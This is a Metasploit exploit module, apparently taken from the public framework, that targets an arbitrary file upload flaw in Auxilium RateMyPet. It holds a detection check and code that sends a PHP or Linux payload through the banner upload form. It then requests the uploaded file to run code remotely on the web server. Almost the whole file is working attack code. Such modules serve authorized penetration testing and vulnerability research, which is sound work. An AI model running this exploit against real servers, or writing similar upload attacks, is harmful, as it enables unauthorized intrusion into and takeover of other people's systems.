1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::PhpEXE
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
17
        'Description' => %q{
18
          This module exploits a vulnerability found in Auxilium RateMyPet's. The site
19
          banner uploading feature can be abused to upload an arbitrary file to the web
20
          server, which is accessible in the 'banner' directory, thus allowing remote code
21
          execution.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'DaOne', # Vulnerability discovery
26
          'sinn3r' # Metasploit
27
        ],
28
        'References' => [
29
          ['OSVDB', '85554'],
30
          ['EDB', '21329']
31
        ],
32
        'Payload' => {
33
          'BadChars' => "\x00"
34
        },
35
        'Platform' => %w{linux php},
36
        'Targets' => [
37
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
38
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
39
        ],
40
        'Privileged' => false,
41
        'DisclosureDate' => '2012-09-14',
42
        'DefaultTarget' => 0,
43
        'Notes' => {
44
          'Reliability' => UNKNOWN_RELIABILITY,
45
          'Stability' => UNKNOWN_STABILITY,
46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
47
        }
48
      )
49
    )
50

51
    register_options(
52
      [
53
        OptString.new('TARGETURI', [true, 'The base directory to the application', '/Auxiliumpetratepro/'])
54
      ]
55
    )
56
  end
57

58
  def check
59
    uri = target_uri.path
60
    base = File.dirname("#{uri}.")
61

62
    res = send_request_raw({
63
      'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
64
    })
65
    if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
66
      return Exploit::CheckCode::Detected
67
    else
68
      return Exploit::CheckCode::Safe
69
    end
70
  end
71

72
  def upload_exec(base, php_fname, p)
73
    data = Rex::MIME::Message.new
74
    data.add_part('http://', nil, nil, "form-data; name=\"burl\"")
75
    data.add_part('', nil, nil, "form-data; name=\"alt\"")
76
    data.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")
77
    data.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")
78

79
    post_data = data.to_s
80

81
    print_status("Uploading payload (#{p.length.to_s} bytes)...")
82
    res = send_request_cgi({
83
      'method' => 'POST',
84
      'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
85
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
86
      'data' => post_data,
87
    })
88

89
    if not res
90
      print_error("No response from host")
91
      return
92
    end
93

94
    print_status("Requesting '#{php_fname}'...")
95
    res = send_request_raw({ 'uri' => normalize_uri("#{base}/banners/#{php_fname}") })
96
    if res and res.code == 404
97
      print_error("Upload unsuccessful: #{res.code.to_s}")
98
      return
99
    end
100

101
    handler
102
  end
103

104
  def exploit
105
    uri = normalize_uri(target_uri.path)
106
    uri << '/' if uri[-1, 1] != '/'
107
    base = File.dirname("#{uri}.")
108

109
    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
110

111
    p = get_write_exec_payload(:unlink_self => true)
112

113
    upload_exec(base, php_fname, p)
114
  end
115
end
116

117